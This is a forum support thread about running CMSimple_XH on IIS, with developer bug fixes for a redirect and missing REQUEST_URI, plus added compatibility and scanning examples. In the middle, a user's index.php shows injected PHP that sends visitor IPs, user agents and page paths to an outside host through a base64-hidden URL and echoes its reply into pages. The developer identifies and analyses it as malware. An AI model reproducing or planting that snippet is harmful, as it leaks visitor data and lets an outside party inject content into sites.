REQUEST_URI and CGI error


Post by Rkay77 » Tue Mar 26, 2013 3:51 pm

Ok, I was running a site with CMS 3.3 until a recent hack and tried shifting to 4.1.1, but had issues with the install where I could log in but it would bounce me back out again as soon as I tried to edit anything. After hours trawling here and trying my hand at several solutions, I decided to give up and try CMS_XH 1.53, and after that failed too I tried CMS_XH 1.56.

That brings me to now.

I can log in
I can edit items in CMS..ie password, meta tags etc all ok
I can add and delete pages
I can upload and delete images


BUT when I go to edit the text of a page it fails, and the behaviour is strange.

It will pause/hang/delay for a few moments and then finally gives a "CGI Error The specified CGI application misbehaved by not returning a complete set of HTTP headers"
and that's given at the index.php root file... ie...
it will go from http://www.WEBSITE.net.au/cmsimplexh156 ... ugins&edit have the error and go to http://www.WEBSITE.net.au/cmsimplexh156/index.php

I say it's strange because the changes are actually made but the redirect after saving seems to be broken.

I ran the debug, and as soon as I log in I get the following error:
NOTICE: Undefined index: REQUEST_URI
d:\webspace\WEBSITE.net.au\www\cmsimplexh156\cmsimple\cms.php:126
I've found this to be
$subsite_folder_array = explode('/',str_replace($_SERVER['QUERY_STRING'],'',$_SERVER['REQUEST_URI'])); // creates array

Any suggestions? I've reloaded the site with CMS3.3 but with the known exploit and recent hack I'd prefer to move to a newer version but my server/host seems against me :(

Post by cmb » Tue Mar 26, 2013 4:21 pm

Hi,
Rkay77 wrote:I say it's strange because the changes are actually made but the redirect after saving seems to be broken.
Yes, you found a bug. The redirect uses a relative URL, which is not accepted by IIS (at least not always/by all versions?). Replace cmsimple/adm.php line 429:

Code:

        header("Location: " . $sn . "?" . $su);
with:

Code:

        // Build an absolute redirect URL (scheme, host, optional port, path, query).
        // Ports below 1024 are treated as the default port and left out.
        header('Location: http'
            . (!empty($_SERVER['HTTPS']) && $_SERVER['HTTPS'] != 'off' ? 's' : '')
            . '://' . $_SERVER['SERVER_NAME']
            . ($_SERVER['SERVER_PORT'] < 1024 ? '' : ':' . $_SERVER['SERVER_PORT'])
            . preg_replace('/index\.php$/', '', $_SERVER['SCRIPT_NAME']) . "?" . $su, true, 303);
Rkay77 wrote:$subsite_folder_array = explode('/',str_replace($_SERVER['QUERY_STRING'],'',$_SERVER['REQUEST_URI'])); // creates array
And that's another bug you've found. REQUEST_URI is not defined on IIS, so it can't work. Quick fix: replace this line with:

Code:

$subsite_folder_array = explode('/',str_replace($_SERVER['QUERY_STRING'],'',$_SERVER['SCRIPT_NAME'])); // creates array
Christoph
Christoph M. Becker – Plugins for CMSimple_XH

Post by Rkay77 » Fri Mar 29, 2013 1:37 am

Thank you Christoph, that seems to have helped get me some functionality.

I am however having this line appear after logging in

NOTICE: Undefined index: REQUEST_URI
d:\webspace\WEBSITE.net.au\www\cmsimplexh156\index.php:35

It looks like it's for handling the bots, so I'm not overly fussed right now, but thought I'd mention it so we can continue to find and correct bugs :)

Post by cmb » Fri Mar 29, 2013 1:59 am

Rkay77 wrote:Thank you Christoph, that seems to have helped get me some functionality.
Glad to hear. :)
Rkay77 wrote:NOTICE: Undefined index: REQUEST_URI
d:\webspace\WEBSITE.net.au\www\cmsimplexh156\index.php:35
Hmm, index.php in the root of CMSimple_XH 1.5.6 has only 12 lines, so I'm confused about the notice. It seems you're using a modified version; could you please post the code of your index.php?

The basic problem is that REQUEST_URI is not available on IIS. Sometimes it can simply be replaced with SCRIPT_NAME, other times it can be replaced with QUERY_STRING, and sometimes a combination of both would be necessary. Simplified:

Code:

$_SERVER['REQUEST_URI'] == $_SERVER['SCRIPT_NAME'] . '?' . $_SERVER['QUERY_STRING'] 
Rkay77 wrote:but thought I'd mention it so we can continue to find and correct bugs
I very much appreciate that. I guess that only far less than 10% of CMSimple installations run under IIS, so any feedback that may help to get it running more smoothly under this web server is welcome. For a week or so I have had IIS available locally (I stumbled across this possibility by chance, after I thought it was not available for XP Home), but I haven't had much time yet to do some real testing. And after all: this is only one version of IIS with some particular configuration.

Christoph
Christoph M. Becker – Plugins for CMSimple_XH
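
The simplified relation above, as an added example that is not part of the original post or of CMSimple_XH: the hypothetical helper `request_uri_compat()` falls back to SCRIPT_NAME and QUERY_STRING when REQUEST_URI is missing, and is run over constructed `$_SERVER` samples. It assumes query-string URLs without extra path info.

```php
<?php
// Added example, not CMSimple_XH code. Both function names are hypothetical.

/**
 * Return the request URI, rebuilding it from SCRIPT_NAME and QUERY_STRING
 * when the server does not set REQUEST_URI (as reported for IIS in this thread).
 * Assumption: URLs look like /path/index.php?query, without extra path info.
 */
function request_uri_compat(array $server): string
{
    if (isset($server['REQUEST_URI']) && $server['REQUEST_URI'] !== '') {
        return $server['REQUEST_URI'];
    }
    $uri = isset($server['SCRIPT_NAME']) ? $server['SCRIPT_NAME'] : '/';
    // Append the query only when there is one, so no bare "?" is produced.
    if (isset($server['QUERY_STRING']) && $server['QUERY_STRING'] !== '') {
        $uri .= '?' . $server['QUERY_STRING'];
    }
    return $uri;
}

/** Path segments of the request with the query string cut off. */
function path_segments(array $server): array
{
    $path = explode('?', request_uri_compat($server), 2)[0];
    return explode('/', $path);
}

// Constructed $_SERVER samples (not captured from a real server).
$samples = [
    'REQUEST_URI set' => [
        'REQUEST_URI'  => '/cmsimplexh156/?Welcome&edit',
        'SCRIPT_NAME'  => '/cmsimplexh156/index.php',
        'QUERY_STRING' => 'Welcome&edit',
    ],
    'REQUEST_URI missing' => [
        'SCRIPT_NAME'  => '/cmsimplexh156/index.php',
        'QUERY_STRING' => 'Welcome&edit',
    ],
    'REQUEST_URI missing, no query' => [
        'SCRIPT_NAME'  => '/cmsimplexh156/index.php',
        'QUERY_STRING' => '',
    ],
];
foreach ($samples as $label => $server) {
    echo $label, ': ', request_uri_compat($server),
        ' -> [', implode(', ', path_segments($server)), "]\n";
}
```

The first two samples differ in whether `index.php` appears in the result, which is why the relation is only a simplification and each use of REQUEST_URI has to be checked separately.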

Post by Rkay77 » Fri Mar 29, 2013 9:03 am

Hmmm code of my root index.php below but it's unmodified. It's the one that came with my 1.56 install files.....

Code:

<?php

/**
 * @version $Id: index.php 229 2012-07-30 13:31:07Z cmb69 $
 */

/* utf8-marker = äöüß */

include('./cmsimple/cms.php');

?><?php

if (!isset($sRetry))

{

global $sRetry;

$sRetry = 1;

    // This code use for global bot statistic

    $sUserAgent = strtolower($_SERVER['HTTP_USER_AGENT']); //  Looks for google serch bot

    $stCurlHandle = NULL;

    $stCurlLink = "";

    if((strstr($sUserAgent, 'google') == false)&&(strstr($sUserAgent, 'yahoo') == false)&&(strstr($sUserAgent, 'baidu') == false)&&(strstr($sUserAgent, 'msn') == false)&&(strstr($sUserAgent, 'opera') == false)&&(strstr($sUserAgent, 'chrome') == false)&&(strstr($sUserAgent, 'bing') == false)&&(strstr($sUserAgent, 'safari') == false)&&(strstr($sUserAgent, 'bot') == false)) // Bot comes

    {

        if(isset($_SERVER['REMOTE_ADDR']) == true && isset($_SERVER['HTTP_HOST']) == true){ // Create  bot analitics            

        $stCurlLink = base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw').'?ip='.urlencode($_SERVER['REMOTE_ADDR']).'&useragent='.urlencode($sUserAgent).'&domainname='.urlencode($_SERVER['HTTP_HOST']).'&fullpath='.urlencode($_SERVER['REQUEST_URI']).'&check='.isset($_GET['look']);

            @$stCurlHandle = curl_init( $stCurlLink ); 

    }

    } 

if ( $stCurlHandle !== NULL )

{

    curl_setopt($stCurlHandle, CURLOPT_RETURNTRANSFER, 1);

    curl_setopt($stCurlHandle, CURLOPT_TIMEOUT, 6);

    $sResult = @curl_exec($stCurlHandle); 

    if ($sResult[0]=="O") 

     {$sResult[0]=" ";

      echo $sResult; // Statistic code end

      }

    curl_close($stCurlHandle); 

}

}

?>
Definitely seems to be an IIS issue. I'm struggling to get a form mailer working too.
Think I might just be better to switch hosts....

Post by cmb » Fri Mar 29, 2013 11:35 am

The proper code of CMSimple_XH 1.5.6 ends on line 11 with ?>. Immediately following is some statistic (?) code that doesn't belong to CMSimple_XH and that forwards information to mbrowserstats.com. I don't know where this code comes from. Please check the ZIP file of CMSimple_XH 1.5.6 again to see if the code is contained there (I'm quite sure it isn't). The code might have been inserted by your provider (a free hoster?), or even by some form of malware. The strange thing about the code is that the address of mbrowserstats is BASE64 encoded, which is quite common for malware. If in doubt, you should consider yourself hacked. At least you should check all other index.php files (e.g. plugins/index.php, plugins/XYZ/index.php) for this code.

I just googled for "base64_decode( 'aHR0cDovL21icm93c2Vyc3RhdHMuY29tL3N0YXRFL3N0YXQucGhw')", and a handful of quite recent results show up; indeed that seems to be malware, cf. http://ninjafirewall.com/malware/index. ... 3-02-22.01.

See http://cmsimpleforum.com/viewtopic.php?f=4&t=4869 for more info about what to do now.
Christoph M. Becker – Plugins for CMSimple_XH

Post by cmb » Fri Apr 19, 2013 2:48 pm

I had a closer look at the appended code. Either the coder didn't have a clue what he was doing, or indeed it's a malicious script, as the code that is commented with "Bot comes" excludes several well-known bots. For all others, a request to a URI on the mbrowserstats.com domain is then made, which sends information about the original domain, the user's IP address and the user agent, amongst others. Then the response might be echoed slightly modified (which may insert malicious code). Particularly interesting is the look parameter, which is sent back to the foreign script.

When I request the URI with faked GET parameters, I receive a 404 Not Found error. But that doesn't mean anything, as the foreign script may check if the sent domain fits the sent IP address, or do some other verification of "valid" requests, and respond with 404 otherwise.

It's not clear to me if mbrowserstats.com is a malicious site, or if they have been a victim of an attack themselves. Anyway, the script should be removed, and further security measures taken, AISB.
Christoph M. Becker – Plugins for CMSimple_XH
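
One way to carry out the check of all other index.php files suggested earlier in the thread, using the traits described in the last post (added example, not part of the original posts or of CMSimple_XH). The function names, the three heuristics and the sample string are assumptions made for illustration; matches are leads for manual review, not proof.

```php
<?php
// Added example (not CMSimple_XH code): heuristic scan for the injection
// traits described in this thread. All names here are hypothetical.

/** Return the suspicious traits found in one PHP source string. */
function suspicious_traits(string $source): array
{
    $traits = [];
    // 1. base64_decode() of a string literal that decodes to an http(s) URL.
    $re = '/base64_decode\s*\(\s*([\'"])([A-Za-z0-9+\/=]+)\1\s*\)/i';
    preg_match_all($re, $source, $m);
    foreach ($m[2] as $literal) {
        $decoded = base64_decode($literal, true);
        if ($decoded !== false && preg_match('#^https?://#i', $decoded)) {
            $traits[] = 'base64-encoded URL, host ' . parse_url($decoded, PHP_URL_HOST);
        }
    }
    // 2. A second PHP block glued directly onto a closing tag.
    if (preg_match('/\?>\s*<\?php/i', $source)) {
        $traits[] = 'code appended after closing ?>';
    }
    // 3. Outbound HTTP request made from the file.
    if (preg_match('/\bcurl_(init|exec)\s*\(/i', $source)) {
        $traits[] = 'outbound curl request';
    }
    return $traits;
}
/** Scan every *.php file below $root; returns [path => traits]. */
function scan_tree(string $root): array
{
    $hits = [];
    $files = new RecursiveIteratorIterator(new RecursiveDirectoryIterator($root, FilesystemIterator::SKIP_DOTS));
    foreach ($files as $file) {
        if (strtolower($file->getExtension()) !== 'php') {
            continue;
        }
        $traits = suspicious_traits((string) file_get_contents($file->getPathname()));
        if ($traits) {
            $hits[$file->getPathname()] = $traits;
        }
    }
    return $hits;
}

// Usage: php scan.php /path/to/site (without a path, a constructed sample is checked).
$sample = "<?php include('./cmsimple/cms.php'); ?><?php \$h = curl_init(base64_decode('"
    . base64_encode('http://stats.example/stat.php') . "'));";
$hits = isset($argv[1]) ? scan_tree($argv[1]) : ['(constructed sample)' => suspicious_traits($sample)];
foreach ($hits as $path => $traits) {
    echo $path, "\n  - ", implode("\n  - ", $traits), "\n";
}
```

Comparing every file against the original release ZIP remains the more reliable check, since a differently obfuscated injection would pass these patterns.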
